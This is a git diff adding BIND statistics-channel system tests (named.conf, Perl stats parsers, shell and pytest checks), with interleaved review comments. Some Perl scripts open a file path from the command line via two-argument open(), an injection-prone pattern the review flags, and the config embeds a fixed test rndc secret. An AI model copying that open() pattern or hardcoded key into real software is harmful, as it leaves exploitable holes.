new file mode 100644
index 0000000..5f08c3f
--- /dev/null
+++ b/bin/tests/system/statschannel/ns3/named.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+ minimal-responses no;
+ version none; // make statistics independent of the version number
+};
+
+statistics-channels { inet 10.53.0.3 port @EXTRAPORT1@ allow { localhost; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "example" {
+ type secondary;
+ file "example.db";
+ primaries { 10.53.0.1; };
+};
diff --git a/bin/tests/system/statschannel/prereq.sh b/bin/tests/system/statschannel/prereq.sh
new file mode 100644
index 0000000..4f8a444
--- /dev/null
+++ b/bin/tests/system/statschannel/prereq.sh
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+fail=0
+
+if $PERL -e 'use File::Fetch;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the File::Fetch library." >&2
+ fail=1
+fi
+
+exit $fail
diff --git a/bin/tests/system/statschannel/server-json.pl b/bin/tests/system/statschannel/server-json.pl
new file mode 100644
index 0000000..3715318
--- /dev/null
+++ b/bin/tests/system/statschannel/server-json.pl
@@ -0,0 +1,35 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# server-json.pl:
+# Parses the JSON version of the server stats into a normalized format.
+
+use JSON;
+
+open(INPUT, "<json.stats");
+my $text = do{local$/;<INPUT>};
+close(INPUT);
+
+my $ref = decode_json($text);
+foreach $key (keys %{$ref->{opcodes}}) {
+ print "opcode " . $key . ": " . $ref->{opcodes}->{$key} . "\n";
+}
+foreach $key (keys %{$ref->{rcodes}}) {
+ print "rcode " . $key . ": " . $ref->{rcodes}->{$key} . "\n";
+}
+foreach $key (keys %{$ref->{qtypes}}) {
+ print "qtype " . $key . ": " . $ref->{qtypes}->{$key} . "\n";
+}
+foreach $key (keys %{$ref->{nsstats}}) {
+ print "nsstat " . $key . ": " . $ref->{nsstats}->{$key} . "\n";
+}
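Review bot: In server-json.pl, `open(INPUT, "<json.stats");` uses the two-argument form with a bareword handle and never checks the result, so a missing or unreadable file surfaces only as a JSON decode error further down. traffic-json.pl and zones-json.pl repeat the pattern with `open(INPUT, "<$file")`, where `$file` comes from `$ARGV[0]` and is interpolated into the mode string. I would use the three-argument form with a lexical handle and an explicit failure, `open(my $in, '<', 'json.stats') or die "cannot open json.stats: $!";`, and read from `$in`.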
diff --git a/bin/tests/system/statschannel/server-xml.pl b/bin/tests/system/statschannel/server-xml.pl
new file mode 100644
index 0000000..5f76360
--- /dev/null
+++ b/bin/tests/system/statschannel/server-xml.pl
@@ -0,0 +1,25 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# server-xml.pl:
+# Parses the XML version of the server stats into a normalized format.
+
+use XML::Simple;
+
+my $ref = XMLin("xml.stats");
+my $counters = $ref->{server}->{counters};
+foreach $group (@$counters) {
+ foreach $key (keys %{$group->{counter}}) {
+ print $group->{type} . " " . $key . ": ". $group->{counter}->{$key}->{content} . "\n";
+ }
+}
diff --git a/bin/tests/system/statschannel/setup.sh b/bin/tests/system/statschannel/setup.sh
new file mode 100644
index 0000000..4ebc39b
--- /dev/null
+++ b/bin/tests/system/statschannel/setup.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+for conf in ns*/named.conf.in; do
+ copy_setports "$conf" "$(dirname "$conf")/$(basename "$conf" .in)"
+done
+
+(cd ns2 && $SHELL sign.sh)
diff --git a/bin/tests/system/statschannel/tests.sh b/bin/tests/system/statschannel/tests.sh
new file mode 100644
index 0000000..0480b01
--- /dev/null
+++ b/bin/tests/system/statschannel/tests.sh
@@ -0,0 +1,392 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+DIGCMD="$DIG @10.53.0.2 -p ${PORT}"
+RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s"
+
+if ! $FEATURETEST --have-json-c
+then
+ unset PERL_JSON
+ echo_i "JSON was not configured; skipping" >&2
+elif $PERL -e 'use JSON;' 2>/dev/null
+then
+ PERL_JSON=1
+else
+ unset PERL_JSON
+ echo_i "JSON tests require JSON library; skipping" >&2
+fi
+
+if ! $FEATURETEST --have-libxml2
+then
+ unset PERL_XML
+ echo_i "XML was not configured; skipping" >&2
+elif $PERL -e 'use XML::Simple;' 2>/dev/null
+then
+ PERL_XML=1
+else
+ unset PERL_XML
+ echo_i "XML tests require XML::Simple; skipping" >&2
+fi
+
+if [ ! "$PERL_JSON" -a ! "$PERL_XML" ]; then
+ echo_i "skipping all tests"
+ exit 0
+fi
+
+
+getzones() {
+ sleep 1
+ echo_i "... using $1"
+ case $1 in
+ xml) path='xml/v3/zones' ;;
+ json) path='json/v1/zones' ;;
+ *) return 1 ;;
+ esac
+ file=`$PERL fetch.pl -p ${EXTRAPORT1} $path`
+ cp $file $file.$1.$3
+ $PERL zones-${1}.pl $file $2 2>/dev/null | sort > zones.out.$3
+ result=$?
+ return $result
+}
+
+# TODO: Move loadkeys_on to conf.sh.common
+loadkeys_on() {
+ nsidx=$1
+ zone=$2
+ nextpart ns${nsidx}/named.run > /dev/null
+ $RNDCCMD 10.53.0.${nsidx} loadkeys ${zone} | sed "s/^/ns${nsidx} /" | cat_i
+ wait_for_log 20 "next key event" ns${nsidx}/named.run
+}
+
+status=0
+n=1
+ret=0
+echo_i "checking consistency between named.stats and xml/json ($n)"
+rm -f ns2/named.stats
+$DIGCMD +tcp example ns > dig.out.$n || ret=1
+$RNDCCMD 10.53.0.2 stats 2>&1 | sed 's/^/I:ns1 /'
+query_count=`awk '/QUERY/ {print $1}' ns2/named.stats`
+txt_count=`awk '/TXT/ {print $1}' ns2/named.stats`
+noerror_count=`awk '/NOERROR/ {print $1}' ns2/named.stats`
+if [ $PERL_XML ]; then
+ file=`$PERL fetch.pl -p ${EXTRAPORT1} xml/v3/server`
+ mv $file xml.stats
+ $PERL server-xml.pl > xml.fmtstats 2> /dev/null
+ xml_query_count=`awk '/opcode QUERY/ { print $NF }' xml.fmtstats`
+ xml_query_count=${xml_query_count:-0}
+ [ "$query_count" -eq "$xml_query_count" ] || ret=1
+ xml_txt_count=`awk '/qtype TXT/ { print $NF }' xml.fmtstats`
+ xml_txt_count=${xml_txt_count:-0}
+ [ "$txt_count" -eq "$xml_txt_count" ] || ret=1
+ xml_noerror_count=`awk '/rcode NOERROR/ { print $NF }' xml.fmtstats`
+ xml_noerror_count=${xml_noerror_count:-0}
+ [ "$noerror_count" -eq "$xml_noerror_count" ] || ret=1
+fi
+if [ $PERL_JSON ]; then
+ file=`$PERL fetch.pl -p ${EXTRAPORT1} json/v1/server`
+ mv $file json.stats
+ $PERL server-json.pl > json.fmtstats 2> /dev/null
+ json_query_count=`awk '/opcode QUERY/ { print $NF }' json.fmtstats`
+ json_query_count=${json_query_count:-0}
+ [ "$query_count" -eq "$json_query_count" ] || ret=1
+ json_txt_count=`awk '/qtype TXT/ { print $NF }' json.fmtstats`
+ json_txt_count=${json_txt_count:-0}
+ [ "$txt_count" -eq "$json_txt_count" ] || ret=1
+ json_noerror_count=`awk '/rcode NOERROR/ { print $NF }' json.fmtstats`
+ json_noerror_count=${json_noerror_count:-0}
+ [ "$noerror_count" -eq "$json_noerror_count" ] || ret=1
+fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+ret=0
+echo_i "checking malloced memory statistics xml/json ($n)"
+if [ $PERL_XML ]; then
+ file=`$PERL fetch.pl -p ${EXTRAPORT1} xml/v3/mem`
+ mv $file xml.mem
+ $PERL mem-xml.pl $file > xml.fmtmem
+ grep "'Malloced' => '[0-9][0-9]*'" xml.fmtmem > /dev/null || ret=1
+ grep "'malloced' => '[0-9][0-9]*'" xml.fmtmem > /dev/null || ret=1
+ grep "'maxmalloced' => '[0-9][0-9]*'" xml.fmtmem > /dev/null || ret=1
+fi
+if [ $PERL_JSON ]; then
+ file=`$PERL fetch.pl -p ${EXTRAPORT1} json/v1/mem`
+ mv $file json.mem
+ grep '"malloced":[0-9][0-9]*,' json.mem > /dev/null || ret=1
+ grep '"maxmalloced":[0-9][0-9]*,' json.mem > /dev/null || ret=1
+ grep '"Malloced":[0-9][0-9]*,' json.mem > /dev/null || ret=1
+fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+echo_i "checking consistency between regular and compressed output ($n)"
+for i in 1 2 3 4 5; do
+ ret=0
+ if $FEATURETEST --have-libxml2;
+ then
+ URL=http://10.53.0.2:${EXTRAPORT1}/xml/v3/server
+ filter_str='s#<current-time>.*</current-time>##g'
+ else
+ URL=http://10.53.0.2:${EXTRAPORT1}/json/v1/server
+ filter_str='s#"current-time.*",##g'
+ fi
+ $CURL -D regular.headers $URL 2>/dev/null | \
+ sed -e "$filter_str" > regular.out
+ $CURL -D compressed.headers --compressed $URL 2>/dev/null | \
+ sed -e "$filter_str" > compressed.out
+ diff regular.out compressed.out >/dev/null || ret=1
+ if [ $ret != 0 ]; then
+ echo_i "failed on try $i, probably a timing issue, trying again"
+ sleep 1
+ else
+ break
+ fi
+done
+
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+ret=0
+echo_i "checking if compressed output is really compressed ($n)"
+if $FEATURETEST --with-zlib;
+then
+ REGSIZE=`cat regular.headers | \
+ grep -i Content-Length | sed -e "s/.*: \([0-9]*\).*/\1/"`
+ COMPSIZE=`cat compressed.headers | \
+ grep -i Content-Length | sed -e "s/.*: \([0-9]*\).*/\1/"`
+ if [ ! `expr $REGSIZE / $COMPSIZE` -gt 2 ]; then
+ ret=1
+ fi
+else
+ echo_i "skipped"
+fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+# Test dnssec sign statistics.
+zone="dnssec"
+sign_prefix="dnssec-sign operations"
+refresh_prefix="dnssec-refresh operations"
+ksk_id=`cat ns2/$zone.ksk.id`
+zsk_id=`cat ns2/$zone.zsk.id`
+
+# Test sign operations for scheduled resigning.
+ret=0
+# The dnssec zone has 10 RRsets to sign (including NSEC) with the ZSK and one
+# RRset (DNSKEY) with the KSK. So starting named with signatures that expire
+# almost right away, this should trigger 10 zsk and 1 ksk sign operations.
+echo "${refresh_prefix} ${zsk_id}: 10" > zones.expect
+echo "${refresh_prefix} ${ksk_id}: 1" >> zones.expect
+echo "${sign_prefix} ${zsk_id}: 10" >> zones.expect
+echo "${sign_prefix} ${ksk_id}: 1" >> zones.expect
+cat zones.expect | sort > zones.expect.$n
+rm -f zones.expect
+# Fetch and check the dnssec sign statistics.
+echo_i "fetching zone '$zone' stats data after zone maintenance at startup ($n)"
+if [ $PERL_XML ]; then
+ getzones xml $zone x$n || ret=1
+ cmp zones.out.x$n zones.expect.$n || ret=1
+fi
+if [ $PERL_JSON ]; then
+ getzones json 0 j$n || ret=1
+ cmp zones.out.j$n zones.expect.$n || ret=1
+fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+# Test sign operations after dynamic update.
+ret=0
+(
+# Update dnssec zone to trigger signature creation.
+echo zone $zone
+echo server 10.53.0.2 "$PORT"
+echo update add $zone. 300 in txt "nsupdate added me"
+echo send
+) | $NSUPDATE
+# This should trigger the resign of SOA, TXT and NSEC (+3 zsk).
+echo "${refresh_prefix} ${zsk_id}: 10" > zones.expect
+echo "${refresh_prefix} ${ksk_id}: 1" >> zones.expect
+echo "${sign_prefix} ${zsk_id}: 13" >> zones.expect
+echo "${sign_prefix} ${ksk_id}: 1" >> zones.expect
+cat zones.expect | sort > zones.expect.$n
+rm -f zones.expect
+# Fetch and check the dnssec sign statistics.
+echo_i "fetching zone '$zone' stats data after dynamic update ($n)"
+if [ $PERL_XML ]; then
+ getzones xml $zone x$n || ret=1
+ cmp zones.out.x$n zones.expect.$n || ret=1
+fi
+if [ $PERL_JSON ]; then
+ getzones json 0 j$n || ret=1
+ cmp zones.out.j$n zones.expect.$n || ret=1
+fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+# Test sign operations of KSK.
+ret=0
+echo_i "fetch zone '$zone' stats data after updating DNSKEY RRset ($n)"
+# Add a standby DNSKEY, this triggers resigning the DNSKEY RRset.
+zsk=$("$KEYGEN" -K ns2 -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone")
+$SETTIME -K ns2 -P now -A never $zsk.key > /dev/null
+loadkeys_on 2 $zone || ret=1
+# This should trigger the resign of SOA (+1 zsk) and DNSKEY (+1 ksk).
+echo "${refresh_prefix} ${zsk_id}: 11" > zones.expect
+echo "${refresh_prefix} ${ksk_id}: 2" >> zones.expect
+echo "${sign_prefix} ${zsk_id}: 14" >> zones.expect
+echo "${sign_prefix} ${ksk_id}: 2" >> zones.expect
+cat zones.expect | sort > zones.expect.$n
+rm -f zones.expect
+# Fetch and check the dnssec sign statistics.
+if [ $PERL_XML ]; then
+ getzones xml $zone x$n || ret=1
+ cmp zones.out.x$n zones.expect.$n || ret=1
+fi
+if [ $PERL_JSON ]; then
+ getzones json 0 j$n || ret=1
+ cmp zones.out.j$n zones.expect.$n || ret=1
+fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+# Test sign operations for scheduled resigning (many keys).
+ret=0
+zone="manykeys"
+ksk8_id=`cat ns2/$zone.ksk8.id`
+zsk8_id=`cat ns2/$zone.zsk8.id`
+ksk13_id=`cat ns2/$zone.ksk13.id`
+zsk13_id=`cat ns2/$zone.zsk13.id`
+ksk14_id=`cat ns2/$zone.ksk14.id`
+zsk14_id=`cat ns2/$zone.zsk14.id`
+num_ids=$( (echo $ksk8_id; echo $zsk8_id; echo $ksk13_id; echo $zsk13_id; echo $ksk14_id; echo $zsk14_id;) | sort -u | wc -l)
+# The dnssec zone has 10 RRsets to sign (including NSEC) with the ZSKs and one
+# RRset (DNSKEY) with the KSKs. So starting named with signatures that expire
+# almost right away, this should trigger 10 zsk and 1 ksk sign operations per
+# key.
+echo "${refresh_prefix} ${zsk8_id}: 10" > zones.expect
+echo "${refresh_prefix} ${zsk13_id}: 10" >> zones.expect
+echo "${refresh_prefix} ${zsk14_id}: 10" >> zones.expect
+echo "${refresh_prefix} ${ksk8_id}: 1" >> zones.expect
+echo "${refresh_prefix} ${ksk13_id}: 1" >> zones.expect
+echo "${refresh_prefix} ${ksk14_id}: 1" >> zones.expect
+echo "${sign_prefix} ${zsk8_id}: 10" >> zones.expect
+echo "${sign_prefix} ${zsk13_id}: 10" >> zones.expect
+echo "${sign_prefix} ${zsk14_id}: 10" >> zones.expect
+echo "${sign_prefix} ${ksk8_id}: 1" >> zones.expect
+echo "${sign_prefix} ${ksk13_id}: 1" >> zones.expect
+echo "${sign_prefix} ${ksk14_id}: 1" >> zones.expect
+cat zones.expect | sort > zones.expect.$n
+rm -f zones.expect
+# Fetch and check the dnssec sign statistics.
+echo_i "fetching zone '$zone' stats data after zone maintenance at startup ($n)"
+if test $num_ids -eq 6
+then
+ if [ $PERL_XML ]; then
+ getzones xml $zone x$n || ret=1
+ cmp zones.out.x$n zones.expect.$n || ret=1
+ fi
+ if [ $PERL_JSON ]; then
+ getzones json 2 j$n || ret=1
+ cmp zones.out.j$n zones.expect.$n || ret=1
+ fi
+ if [ $ret != 0 ]; then echo_i "failed"; fi
+else
+ echo_i "skipped: duplicate key id detected (fixed in BIND 9.19)"
+fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+# Test sign operations after dynamic update (many keys).
+ret=0
+(
+# Update dnssec zone to trigger signature creation.
+echo zone $zone
+echo server 10.53.0.2 "$PORT"
+echo update add $zone. 300 in txt "nsupdate added me"
+echo send
+) | $NSUPDATE
+# This should trigger the resign of SOA, TXT and NSEC (+3 zsk).
+echo "${refresh_prefix} ${zsk8_id}: 10" > zones.expect
+echo "${refresh_prefix} ${zsk13_id}: 10" >> zones.expect
+echo "${refresh_prefix} ${zsk14_id}: 10" >> zones.expect
+echo "${refresh_prefix} ${ksk8_id}: 1" >> zones.expect
+echo "${refresh_prefix} ${ksk13_id}: 1" >> zones.expect
+echo "${refresh_prefix} ${ksk14_id}: 1" >> zones.expect
+echo "${sign_prefix} ${zsk8_id}: 13" >> zones.expect
+echo "${sign_prefix} ${zsk13_id}: 13" >> zones.expect
+echo "${sign_prefix} ${zsk14_id}: 13" >> zones.expect
+echo "${sign_prefix} ${ksk8_id}: 1" >> zones.expect
+echo "${sign_prefix} ${ksk13_id}: 1" >> zones.expect
+echo "${sign_prefix} ${ksk14_id}: 1" >> zones.expect
+cat zones.expect | sort > zones.expect.$n
+rm -f zones.expect
+# Fetch and check the dnssec sign statistics.
+echo_i "fetching zone '$zone' stats data after dynamic update ($n)"
+if test $num_ids -eq 6
+then
+ if [ $PERL_XML ]; then
+ getzones xml $zone x$n || ret=1
+ cmp zones.out.x$n zones.expect.$n || ret=1
+ fi
+ if [ $PERL_JSON ]; then
+ getzones json 2 j$n || ret=1
+ cmp zones.out.j$n zones.expect.$n || ret=1
+ fi
+ if [ $ret != 0 ]; then echo_i "failed"; fi
+else
+ echo_i "skipped: duplicate key id detected (fixed in BIND 9.19)"
+fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+# Test sign operations after dnssec-policy change (removing keys).
+ret=0
+copy_setports ns2/named2.conf.in ns2/named.conf
+$RNDCCMD 10.53.0.2 reload 2>&1 | sed 's/^/I:ns2 /'
+# This should trigger the resign of DNSKEY (+1 ksk), and SOA, NSEC,
+# TYPE65534 (+3 zsk). The dnssec-sign statistics for the removed keys should
+# be cleared and thus no longer visible. But NSEC and SOA are (mistakenly)
+# counted double, one time because of zone_resigninc and one time because of
+# zone_nsec3chain. So +5 zsk in total.
+echo "${refresh_prefix} ${zsk8_id}: 15" > zones.expect
+echo "${refresh_prefix} ${ksk8_id}: 2" >> zones.expect
+echo "${sign_prefix} ${zsk8_id}: 18" >> zones.expect
+echo "${sign_prefix} ${ksk8_id}: 2" >> zones.expect
+cat zones.expect | sort > zones.expect.$n
+rm -f zones.expect
+# Fetch and check the dnssec sign statistics.
+echo_i "fetching zone '$zone' stats data after dnssec-policy change ($n)"
+if [ $PERL_XML ]; then
+ getzones xml $zone x$n || ret=1
+ cmp zones.out.x$n zones.expect.$n || ret=1
+fi
+if [ $PERL_JSON ]; then
+ getzones json 2 j$n || ret=1
+ cmp zones.out.j$n zones.expect.$n || ret=1
+fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+n=`expr $n + 1`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/statschannel/tests_json.py b/bin/tests/system/statschannel/tests_json.py
new file mode 100755
index 0000000..c459925
--- /dev/null
+++ b/bin/tests/system/statschannel/tests_json.py
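Review bot: The "regular and compressed output" check in tests.sh can pass without ever reaching the server, because `$CURL -D regular.headers $URL 2>/dev/null | sed -e "$filter_str" > regular.out` discards curl's errors and the pipeline reports only sed's status; two empty files then satisfy `diff regular.out compressed.out`. The zlib check that follows inherits the problem: with an empty `REGSIZE` or `COMPSIZE` the `expr` fails, `[` reports an error instead of true, and `ret` stays 0. I would add `[ -s regular.out ] && [ -s compressed.out ] || ret=1` before the `diff`, and `[ -n "$REGSIZE" ] && [ -n "$COMPSIZE" ] || ret=1` before the size comparison, so that a failed fetch is reported as a failure.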
@@ -0,0 +1,105 @@
+#!/usr/bin/python3
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+from datetime import datetime
+
+import pytest
+
+import generic
+import pytest_custom_markers
+
+pytestmark = pytest_custom_markers.have_json_c
+requests = pytest.importorskip("requests")
+
+
+# JSON helper functions
+def fetch_zones_json(statsip, statsport):
+ r = requests.get(
+ "http://{}:{}/json/v1/zones".format(statsip, statsport), timeout=600
+ )
+ assert r.status_code == 200
+
+ data = r.json()
+ return data["views"]["_default"]["zones"]
+
+
+def fetch_traffic_json(statsip, statsport):
+ r = requests.get(
+ "http://{}:{}/json/v1/traffic".format(statsip, statsport), timeout=600
+ )
+ assert r.status_code == 200
+
+ data = r.json()
+
+ return data["traffic"]
+
+
+def load_timers_json(zone, primary=True):
+ name = zone["name"]
+
+ # Check if the primary zone timer exists
+ assert "loaded" in zone
+ loaded = datetime.strptime(zone["loaded"], generic.fmt)
+
+ if primary:
+ # Check if the secondary zone timers does not exist
+ assert "expires" not in zone
+ assert "refresh" not in zone
+ expires = None
+ refresh = None
+ else:
+ assert "expires" in zone
+ assert "refresh" in zone
+ expires = datetime.strptime(zone["expires"], generic.fmt)
+ refresh = datetime.strptime(zone["refresh"], generic.fmt)
+
+ return (name, loaded, expires, refresh)
+
+
+def load_zone_json(zone):
+ name = zone["name"]
+
+ return name
+
+
+def test_zone_timers_primary_json(statsport):
+ generic.test_zone_timers_primary(
+ fetch_zones_json,
+ load_timers_json,
+ statsip="10.53.0.1",
+ statsport=statsport,
+ zonedir="ns1",
+ )
+
+
+def test_zone_timers_secondary_json(statsport):
+ generic.test_zone_timers_secondary(
+ fetch_zones_json,
+ load_timers_json,
+ statsip="10.53.0.3",
+ statsport=statsport,
+ zonedir="ns3",
+ )
+
+
+def test_zone_with_many_keys_json(statsport):
+ generic.test_zone_with_many_keys(
+ fetch_zones_json, load_zone_json, statsip="10.53.0.2", statsport=statsport
+ )
+
+
+def test_traffic_json(named_port, statsport):
+ generic_dnspython = pytest.importorskip("generic_dnspython")
+ generic_dnspython.test_traffic(
+ fetch_traffic_json, statsip="10.53.0.2", statsport=statsport, port=named_port
+ )
diff --git a/bin/tests/system/statschannel/tests_xml.py b/bin/tests/system/statschannel/tests_xml.py
new file mode 100755
index 0000000..7f0b37e
--- /dev/null
+++ b/bin/tests/system/statschannel/tests_xml.py
@@ -0,0 +1,135 @@
+#!/usr/bin/python3
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+from datetime import datetime
+import xml.etree.ElementTree as ET
+
+import pytest
+
+import generic
+import pytest_custom_markers
+
+pytestmark = pytest_custom_markers.have_libxml2
+requests = pytest.importorskip("requests")
+
+
+# XML helper functions
+def fetch_zones_xml(statsip, statsport):
+ r = requests.get(
+ "http://{}:{}/xml/v3/zones".format(statsip, statsport), timeout=600
+ )
+ assert r.status_code == 200
+
+ root = ET.fromstring(r.text)
+
+ default_view = None
+ for view in root.find("views").iter("view"):
+ if view.attrib["name"] == "_default":
+ default_view = view
+ break
+ assert default_view is not None
+
+ return default_view.find("zones").findall("zone")
+
+
+def fetch_traffic_xml(statsip, statsport):
+ def load_counters(data):
+ out = {}
+ for counter in data.findall("counter"):
+ out[counter.attrib["name"]] = int(counter.text)
+
+ return out
+
+ r = requests.get(
+ "http://{}:{}/xml/v3/traffic".format(statsip, statsport), timeout=600
+ )
+ assert r.status_code == 200
+
+ root = ET.fromstring(r.text)
+
+ traffic = {}
+ for ip in ["ipv4", "ipv6"]:
+ for proto in ["udp", "tcp"]:
+ proto_root = root.find("traffic").find(ip).find(proto)
+ for counters in proto_root.findall("counters"):
+ if counters.attrib["type"] == "request-size":
+ key = "dns-{}-requests-sizes-received-{}".format(proto, ip)
+ else:
+ key = "dns-{}-responses-sizes-sent-{}".format(proto, ip)
+
+ values = load_counters(counters)
+ traffic[key] = values
+
+ return traffic
+
+
+def load_timers_xml(zone, primary=True):
+ name = zone.attrib["name"]
+
+ loaded_el = zone.find("loaded")
+ assert loaded_el is not None
+ loaded = datetime.strptime(loaded_el.text, generic.fmt)
+
+ expires_el = zone.find("expires")
+ refresh_el = zone.find("refresh")
+ if primary:
+ assert expires_el is None
+ assert refresh_el is None
+ expires = None
+ refresh = None
+ else:
+ assert expires_el is not None
+ assert refresh_el is not None
+ expires = datetime.strptime(expires_el.text, generic.fmt)
+ refresh = datetime.strptime(refresh_el.text, generic.fmt)
+
+ return (name, loaded, expires, refresh)
+
+
+def load_zone_xml(zone):
+ name = zone.attrib["name"]
+
+ return name
+
+
+def test_zone_timers_primary_xml(statsport):
+ generic.test_zone_timers_primary(
+ fetch_zones_xml,
+ load_timers_xml,
+ statsip="10.53.0.1",
+ statsport=statsport,
+ zonedir="ns1",
+ )
+
+
+def test_zone_timers_secondary_xml(statsport):
+ generic.test_zone_timers_secondary(
+ fetch_zones_xml,
+ load_timers_xml,
+ statsip="10.53.0.3",
+ statsport=statsport,
+ zonedir="ns3",
+ )
+
+
+def test_zone_with_many_keys_xml(statsport):
+ generic.test_zone_with_many_keys(
+ fetch_zones_xml, load_zone_xml, statsip="10.53.0.2", statsport=statsport
+ )
+
+
+def test_traffic_xml(named_port, statsport):
+ generic_dnspython = pytest.importorskip("generic_dnspython")
+ generic_dnspython.test_traffic(
+ fetch_traffic_xml, statsip="10.53.0.2", statsport=statsport, port=named_port
+ )
diff --git a/bin/tests/system/statschannel/traffic-json.pl b/bin/tests/system/statschannel/traffic-json.pl
new file mode 100644
index 0000000..353d6c7
--- /dev/null
+++ b/bin/tests/system/statschannel/traffic-json.pl
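Review bot: In `fetch_traffic_xml` the lookup `root.find("traffic").find(ip).find(proto)` raises AttributeError on the first missing element, whereas `fetch_zones_xml` asserts `default_view is not None` so that an unexpected response fails as an assertion. For consistency I would write `proto_root = root.find("traffic/{}/{}".format(ip, proto))` followed by `assert proto_root is not None`. `fetch_zones_xml` has the same unchecked chain in `root.find("views")` and `default_view.find("zones")`.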
@@ -0,0 +1,49 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# traffic-json.pl:
+# Parses the JSON version of the RSSAC002 traffic stats into a
+# normalized format.
+
+use JSON;
+
+my $file = $ARGV[0];
+open(INPUT, "<$file");
+my $text = do{local$/;<INPUT>};
+close(INPUT);
+
+my $ref = decode_json($text);
+
+my $tcprcvd = $ref->{traffic}->{"dns-tcp-requests-sizes-received-ipv4"};
+my $type = "tcp request-size ";
+foreach $key (keys %{$tcprcvd}) {
+ print $type . $key . ": ". $tcprcvd->{$key} ."\n";
+}
+
